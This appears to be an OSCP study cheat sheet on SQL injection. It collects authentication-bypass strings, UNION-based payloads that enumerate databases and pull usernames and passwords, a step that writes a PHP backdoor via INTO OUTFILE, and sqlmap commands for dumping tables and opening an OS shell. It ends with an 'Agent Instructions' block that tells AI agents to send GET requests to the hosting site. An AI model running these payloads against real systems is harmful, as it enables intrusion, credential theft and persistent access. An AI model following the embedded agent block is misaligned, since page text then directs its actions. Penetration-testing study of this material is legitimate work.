# SQL Injection **1.** Browse to target site \*\* **2.** Configure Burp proxy, point browser Burp (**127.0.0.1:8080**) with Burp set to intercept in the proxy tab.\ **3.** Click on the submit button on the login form\ **4.** Burp catches the **POST request** and waits ![](https://hackertarget.com/burp-testing-post-request.png) **5.** Copy the POST request to a text file, I have called it search-test.txt and placed it in the sqlmap directory\ **6.** Run sqlmap as shown here; the option **-r** tells sqlmap to read the search-test.txt file to get the information to attack in the POST request. **-p** is the parameter we are attacking. ``` ./sqlmap.py -r search-test.txt -p tfUPass ``` ``` Testing for Bypasses: ' or 1=1 LIMIT 1 -- ' or 1=1 LIMIT 1 -- - ' or 1=1 LIMIT 1# 'or 1# ' or 1=1 -- ' or 1=1 -- - # SQLMAP ## sqlmap crawl sqlmap -u http://172.21.0.0 --crawl=1 ## sqlmap dump database sqlmap -u http://172.21.0.0 --dbms=mysql --dump ## sqlmap shell sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell # SQLI Testing for a row: - http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 ``` Another simple test: ``` ' or '1'='1 ``` Other tests: ``` -' ' ' '&' '^' '*' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' "-" " " "&" "^" "*" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x ``` ### POST parameters You can also attempt to inject parameters passed using POST requests, but you'll need Burp or Firefox tamper to view and edit them. For example, you can test a parameter by adding a `'` at the end, like `lang=en'`. ## Bypassing authentication If you find a poorly-sanitized login page, you can attempt to log in without credentials by injecting the username parameter: ``` username' or 1=1;# username'- ``` ## Database enumeration The exact syntax for injection will vary by database type. In most lab scenarios, the database will be MySQL. Get version: ``` http://[host]/inject.php?id=1 union all select 1,2,3,@@version,5 ``` You can get the number of columns through trial and error using `order by`. For each query, increase the column number until the database throws an unknown column error: ``` http://[host]/inject.php?id=54 order by 1 http://[host]/inject.php?id=54 order by 2 http://[host]/inject.php?id=54 order by 3 ``` Get the current user: ``` http://[host]/inject.php?id=1 union all select 1,2,3,user(),5 ``` See all tables: ``` http://[host]/inject.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables ``` Get column names for a specified table: ``` http://[host]/inject.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users' ``` Get usernames and passwords (0x3a means `:`): ``` http://[host]/inject.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users ``` You might be able to write to system files depending on permission levels using MySQL's `INTO OUTFILE` function to create a php shell in the web root: ``` http://[host]/inject.php?id=54 union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php' ``` I suspect you could inject a full reverse shell in there too... ## SQLmap Assuming you've tested a parameter with `'` and it is injectable, run SQL map against the URL: ``` sqlmap -u "http://[host]/inject.php?param1=1¶m2=whatever" --dbms=mysql ``` It may not run unless you specify the database type. Get the databases: ``` sqlmap -u "http://[host]/inject.php?param1=1¶m2=whatever" --dbs --dbms=mysql ``` Get the tables in a database: ``` sqlmap -u "http://[host]/inject.php?param1=1¶m2=whatever" --tables -D [database name] ``` Get the columns in a table: ``` sqlmap -u "http://[host]/inject.php?param1=1¶m2=whatever" --columns -D [database name] -T [table name] ``` Dump a table: ``` sqlmap -u "http://[host]/inject.php?param1=1¶m2=whatever" --dump -D [database name] -T [table name] ``` ### Passing tokens If the URL isn't accessible, you can pass cookie data or authentication credentials to SQLmap by pasting the post request in a file and using the `-r` option: ``` sqlmap -r request.txt ``` If you just need to pass a cookie: ``` sqlmap -u "http://[host]/inject.php" --cookie "PHPSESSID=foobar" ``` ### REST-style URLs If your URLs have no parameters, you can still test them: ``` sqlmap -u "http://[host]/param1*/param2*" ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://rabakuku.gitbook.io/oscp/services/web/sql-inejection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.